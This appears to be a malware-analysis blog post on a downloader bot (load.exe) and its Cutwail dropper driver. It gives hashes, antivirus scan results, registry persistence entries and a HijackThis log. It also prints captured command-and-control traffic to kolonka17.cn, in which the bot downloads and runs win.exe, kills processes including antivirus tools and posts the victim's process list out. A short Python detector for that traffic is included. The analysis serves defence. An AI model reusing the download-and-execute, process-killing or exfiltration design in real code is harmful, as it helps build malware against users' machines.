Serpent BOT (Web Based Malware)
Steve sent me another malware sample he found, but this time it is web-based malware controlled through a web interface:

The file that established the connections with the website was named load.exe; below is the scan report:
Report Generated 22.11.2008 at 23.15.36 (GMT 1)
Filename: load.exe
File size: 27 KB
MD5 Hash: 97A860C202A8016E08818F3AA90525B8
SHA1 Hash: CADF466ABD29CD993DD81EC838282589D0077BAC
CRC32: 89416946
Application Type: Executable (EXE) 32bit
Packer detected: Microsoft Visual C++ 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 23 on 23
Antivirus Result
a-squared Trojan-Downloader.Agent!IK
Avira AntiVir TR/Dldr.Agent.agl
Avast Win32:Small-JMK [Trj] (0)
AVG Trojan horse Downloader.Zlob.12.R
BitDefender Trojan.Crypt.AI
ClamAV Worm.Socks-11
Comodo TrojWare.Win32.PSW.Agent.NHG
Dr.Web Trojan.PWS.Pace
Ewido Downloader.Agent.llo
F-PROT 6 W32/Socks.A.gen!Eldorado (generic, not disinfectable)
G DATA Trojan-Downloader.Win32.Agent.llo A
IkarusT3 Trojan-Downloader.Agent
Kaspersky Trojan-Downloader.Win32.Agent.llo
McAfee BackDoor-DRW trojan
MHR (Malware Hash Registry) Virus Found – detect rate 75%
NOD32 v3 Win32/PSW.Agent.NHG trojan
Norman Trojan W32/Agent.EXZF ()
QuickHeal TrojanDownloader.Agent.llo
Solo Antivirus Infection TrojanDropper.Win32.Small.Bgx
Sophos Troj/Dloadr-BMT
TrendMicro WORM_SOCKS.BL
VBA32 Trojan-Downloader.Win32.Agent.llo
VirusBuster Trojan.DL.Agent.ETEH
When I executed this load.exe file, a lot of traffic was generated towards this domain:
kolonka17.cn
Internet traffic:
GET /loader/?&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
With the traffic below, another executable named win.exe is downloaded and executed on my system:
GET /loader/manda.php?id=-695459345&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29

hxxp://kolonka17.cn/win.exe|5

GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
Next we see traffic to a new host, to which it sends a lot of encrypted data:
GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106

HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...
Below there is some more interesting traffic:
GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2

ok

GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain

regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe
Here the malware receives the command to kill a list of processes on my system:
GET /loader/proc_kill HTTP/1.1
But the malware does not stop at killing processes: it also deletes some important system executables, such as:
C:\WINDOWS\explorer.exe
In the traffic below we can see the malware receiving further commands:
GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain

none.exe
taskmon.exe
qip.exe

GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain

tasklis2t.exe
inf3ium.exe
note4pad.exe
These commands are again related to process killing. Afterwards, the infected machine sends new traffic to the domain:
POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289

proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800

HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html
We can see that the malware has sent information about the processes currently running on my system, and note that it also reports the size of each process. This information could be used by future malware versions, perhaps to build evasion code or to detect certain processes the malware does not like.
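The loader's exchanges above (the v=ver beacon, the text/plain command lists returned by proc_kill, proc_run and proc_killsize, and the process-list POST to data.php) are specific enough to turn into simple network-detection logic. The following Python is an added example, not the author's code and nothing from the bot itself: it parses raw HTTP requests (constructed here from the captures in this post, plus one benign request as a control), reports which loader indicators each one matches, and splits a command reply into a deduplicated process list.

```python
import re

# Indicators taken from the captured traffic: the /loader/ URI scheme and its
# command endpoints, the v=ver beacon parameter, the placeholder User-Agent "_".
C2_PATH = re.compile(
    r"^/loader/(?P<cmd>manda\.php|data\.php|proc_kill|proc_run|proc_killsize)?(?:\?|$)")

# Constructed sample requests rebuilt from the captures above (not a live pcap).
SAMPLE_REQUESTS = [
    "GET /loader/?&v=ver&s=9988 HTTP/1.1\r\nUser-Agent: _\r\nHost: kolonka17.cn\r\n\r\n",
    "GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1\r\nUser-Agent: _\r\n"
    "Host: kolonka17.cn\r\nCookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf\r\n\r\n",
    "GET /loader/proc_kill HTTP/1.1\r\nUser-Agent: _\r\nHost: kolonka17.cn\r\n\r\n",
    "POST /loader/data.php?id=-789987028 HTTP/1.1\r\nHost: kolonka17.cn\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\nproc=[System Process]\nload.exe\nsize=12800\n27648",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.com\r\n\r\n",  # benign control
]

def parse_request(raw):
    """Split one raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in header_lines)}
    return method, path, headers, body

def c2_indicators(raw):
    """Return the loader indicators one request matches (empty list = nothing suspicious)."""
    method, path, headers, body = parse_request(raw)
    hits = []
    m = C2_PATH.match(path)
    if m:
        hits.append("loader-uri:" + (m.group("cmd") or "beacon"))
    query = dict(p.split("=", 1) for p in path.partition("?")[2].split("&") if "=" in p)
    if query.get("v") == "ver":
        hits.append("loader-query:v=ver")
    if headers.get("user-agent") == "_":
        hits.append("placeholder-user-agent")
    if method == "POST" and body.startswith("proc="):
        hits.append("process-list-exfil")
    return hits

def parse_command_list(body):
    """Command replies are text/plain, one process name per line; the capture repeats
    nod32kui.exe and egui.exe, so dedupe (case-insensitively) while keeping order."""
    seen, names = set(), []
    for name in body.split():
        if name.lower().endswith(".exe") and name.lower() not in seen:
            seen.add(name.lower())
            names.append(name)
    return names
```

Feeding the same parser with requests extracted from a proxy log or pcap lets you alert on the v=ver beacon and the "_" User-Agent even when the domain changes.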
Next we see traffic on the SMTP port (25):
Protocol : TCP
Local Address : 64.233.183.27
Local Port : 25
220 mx.google.com ESMTP k5si310246nfh.0

Protocol : TCP
Local Address : 209.85.135.114
Local Port : 25
220 mx.google.com ESMTP n10si1763302mue.37

Protocol : TCP
Local Address : 94.100.176.20
Local Port : 25
220 Mail.Ru ESMTP

Protocol : TCP
Local Address : 216.157.145.27
Local Port : 25
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008
A new driver is also loaded by the malware:
C:\WINDOWS\system32\drivers\Winkk44.sys
Scan report:
Report Generated 22.11.2008 at 23.32.46 (GMT 1)
Filename: Winkk44.sys
File size: 32 KB
MD5 Hash: 286C4C43EFED1D81C59AA7BC70B83BD8
SHA1 Hash: 4D09AC6BE2808360697E7ECA71BEBF7CADFDE985
CRC32: 2495620378
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 7 on 24
Antivirus Result
a-squared Trojan-Dropper.Cutwail!IK
Avira AntiVir -
Avast -
AVG Virus found BackDoor.Ntrootkit
BitDefender Trojan.Dropper.Cutwail.D
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Trojan-Downloader.Win32.Mutant.aim A
IkarusT3 Trojan-Dropper.Cutwail
Kaspersky Trojan-Downloader.Win32.Mutant.aim
McAfee -
MHR (Malware Hash Registry) -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus Infection TrojanDownloader.Win32.Mutant.Aim
Sophos -
TrendMicro -
VBA32 -
VirusBuster -
Again a Trojan.Dropper.Cutwail.D!
Below are some interesting strings extracted from Winkk44.sys:
winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys
As we can see from the image below, this driver is also loaded when the operating system boots in Safe Mode:

During the analysis, no SSDT/Shadow SSDT hooks and no stealth code were detected. I got a BSOD when trying to open certain anti-rootkit software; the file Winkk44.sys is protected from modification and deletion, and its registry keys are protected in the same way.
Running processes visible in Task Manager:

Registry keys used by the malware to startup with Windows:

Service info:

These are the malware traces visible in a HijackThis log:
Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe
Below is a short summary of the files created by the malware:
C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe